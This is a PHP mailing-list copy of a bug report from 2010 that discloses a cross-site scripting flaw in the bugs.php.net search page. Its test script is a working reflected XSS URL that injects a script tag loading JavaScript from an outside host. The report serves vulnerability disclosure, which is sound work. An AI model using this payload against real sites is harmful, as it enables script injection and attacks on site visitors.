Bug #51722 [NEW]: Cross Site Scripting Vulnerability on Bug Tracking Site

From: Date: Sun, 02 May 2010 21:25:35 +0000
Subject: Bug #51722 [NEW]: Cross Site Scripting Vulnerability on Bug Tracking Site
Groups: php.webmaster 
Request: Send a blank email to php-webmaster+get-8072@lists.php.net to get a copy of this message
From: Operating system: PHP version: Irrelevant Package: Website problem Bug Type: Bug Bug description:Cross Site Scripting Vulnerability on Bug Tracking Site Description: ------------ The bugs.php.net search engine does not sanitize it's input, thus allowing an xss attack. The vulnerability has been posted on a blog and reposted on Reddit (http://www.reddit.com/r/netsec/comments/bz4fw/php_website_xss_defacement/), but since I didn't see a bug report for it and it's still active I'm assuming it hasn't been picked up by you guys. Test script: --------------- http://bugs.php.net/search.php?cmd=display&search_for=&php_os=&php_os_not=&author_email=&bug_type=&boolean=0&bug_age=%22%3E%3Cscript%20src=%22http://www.yourjavascript.com/38310202111/xss.js%22%20/%3E%3C&bug_updated=0&order_by=id&direction=DESC&limit=30&phpver=&assign=&status=Open&begin=0 Expected result: ---------------- I expect the injected javascript not to run. Actual result: -------------- The injected javascript runs. -- Edit bug report at http://bugs.php.net/bug.php?id=51722&edit=1 -- Try a snapshot (PHP 5.2): http://bugs.php.net/fix.php?id=51722&r=trysnapshot52 Try a snapshot (PHP 5.3): http://bugs.php.net/fix.php?id=51722&r=trysnapshot53 Try a snapshot (PHP 6.0): http://bugs.php.net/fix.php?id=51722&r=trysnapshot60 Fixed in SVN: http://bugs.php.net/fix.php?id=51722&r=fixed Fixed in SVN and need be documented: http://bugs.php.net/fix.php?id=51722&r=needdocs Fixed in release: http://bugs.php.net/fix.php?id=51722&r=alreadyfixed Need backtrace: http://bugs.php.net/fix.php?id=51722&r=needtrace Need Reproduce Script: http://bugs.php.net/fix.php?id=51722&r=needscript Try newer version: http://bugs.php.net/fix.php?id=51722&r=oldversion Not developer issue: http://bugs.php.net/fix.php?id=51722&r=support Expected behavior: http://bugs.php.net/fix.php?id=51722&r=notwrong Not enough info: http://bugs.php.net/fix.php?id=51722&r=notenoughinfo Submitted twice: http://bugs.php.net/fix.php?id=51722&r=submittedtwice register_globals: http://bugs.php.net/fix.php?id=51722&r=globals PHP 4 support discontinued: http://bugs.php.net/fix.php?id=51722&r=php4 Daylight Savings: http://bugs.php.net/fix.php?id=51722&r=dst IIS Stability: http://bugs.php.net/fix.php?id=51722&r=isapi Install GNU Sed: http://bugs.php.net/fix.php?id=51722&r=gnused Floating point limitations: http://bugs.php.net/fix.php?id=51722&r=float No Zend Extensions: http://bugs.php.net/fix.php?id=51722&r=nozend MySQL Configuration Error: http://bugs.php.net/fix.php?id=51722&r=mysqlcfg

« previous php.webmaster (#8072) next »